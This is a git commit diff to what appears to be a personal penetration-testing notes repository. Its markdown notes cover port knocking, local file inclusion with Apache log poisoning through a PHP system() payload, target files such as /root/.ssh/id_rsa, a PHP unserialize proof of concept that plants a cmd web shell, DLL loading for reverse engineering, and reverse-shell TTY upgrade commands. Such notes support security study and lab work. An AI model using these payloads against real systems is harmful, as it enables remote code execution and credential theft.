notes on reversing

2021-11-24 23:52:42 +01:00 · 2021-11-24 23:52:42 +01:00 · 375271ef5d
parent 469aeb2618
commit 375271ef5d
7 changed files with 68 additions and 4 deletions
--- a/enumeration/docs/port_knocking.md
+++ b/enumeration/docs/port_knocking.md
@ -0,0 +1,13 @@
 # Port Knocking
 * Open filtered port behind a firewall by knocking nicely
 ## Usage
 * `knockd` 
 ```sh
 knock <target-IP> <magicWords>
 ```
 or
 * [arch wiki nmap script](https://wiki.archlinux.org/title/Port_knocking)
 * `nc -z`
--- a/exploit/web/local_file_inclusion.md
+++ b/exploit/web/local_file_inclusion.md
@ -26,10 +26,17 @@ http://example.com/home?page=/etc/passwd
 ```sh
 curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: <TARGETIP>' -H 'User-Agent: Mozilla/5.0 <?php system($_GET['lfi']); ?> Firefox/70.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Upgrade-Insecure-Requests: 1'
 ```
-    * Follow up with a request to
+
-    ```HTTP
+* Follow up with a request to
-    curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
+
-    ```
+```HTTP
 curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
 ```
 ### /proc/self/fd
 * [outpost24](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2)
 *  Log poisoning and opening logfile via `/proc/self/fd/xx`.
 ### Base64 Encoding via PHP
 * Circumvent filter via encoding local files included ins a GET parameter value
 ```http
@ -48,9 +55,11 @@ curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<
 * `/root/.ssh/id_rsa`
 * `/var/log/apache2/access.log`
 * `C:\boot.ini`
 * `/proc/self/fd/xx`
 ## Tricks
 * Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4
 * Terminate query with `/.`
 * `..//..//..//file`, double slashes
--- a/exploit/web/php/unserialize.md
+++ b/exploit/web/php/unserialize.md
@ -0,0 +1,20 @@
 # Unserialize
 * [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize/)
 * Serialize via
 ```php
 <?php
 class FormSubmit {
    public $form_file = 'messages.php';
    public $message = '<?php
    if(isset($_GET[\'cmd\']))
    {
        system($_GET[\'cmd\']);
    }
 ?>';
 }
 print urlencode(serialize(new FormSubmit));
 ?>
 ```
--- a/reverse_engineering/docs/dll_reversing.md
+++ b/reverse_engineering/docs/dll_reversing.md
@ -0,0 +1,9 @@
 # DLL Reversing
 * Start DLL on its own with the help a wrapper
 ```C#
 HMODULE dll = LoadLibraryA("DLL.DLL");
 typedef void(WINAPI* Add_TypeDef)(int, int); // Add(int x, int y)
 Add_TypeDef Add = (Add_TypeDef)GetProcAddress(dll, "Add_MangledName");
 Add(1, 2);
 ```
--- a/reverse_engineering/docs/function_mangling.md
+++ b/reverse_engineering/docs/function_mangling.md
@ -0,0 +1,4 @@
 # Function Decoration
 * Done to imported functions in order to do interpositioning and identify the variants of the function.
 * [name mangling](https://en.wikipedia.org/wiki/Name_mangling)
--- a/reverse_shells/docs/prep
+++ b/reverse_shells/docs/prep
--- a/reverse_shells/docs/shell_upgrade.md
+++ b/reverse_shells/docs/shell_upgrade.md
@ -1,5 +1,9 @@
 # Upgrade Reverse Shell 
 * [HighOn.Coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
 * [reverse shell without python](https://www.schtech.co.uk/linux-reverse-shell-without-python/)
 * [ropnop](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)
 ## Via interpreter
 ### PHP
 * reverse shell
@ -24,6 +28,11 @@ python -c 'import pty; pty.spawn("/bin/bash")'
 perl -e 'exec "/bin/sh";'
 ```
 ### Script
 ```sh
 /usr/bin/script -qc /bin/bash /dev/null
 ```
 ## Next
 1. `ctrl` + `z`
 2. `stty echo -raw`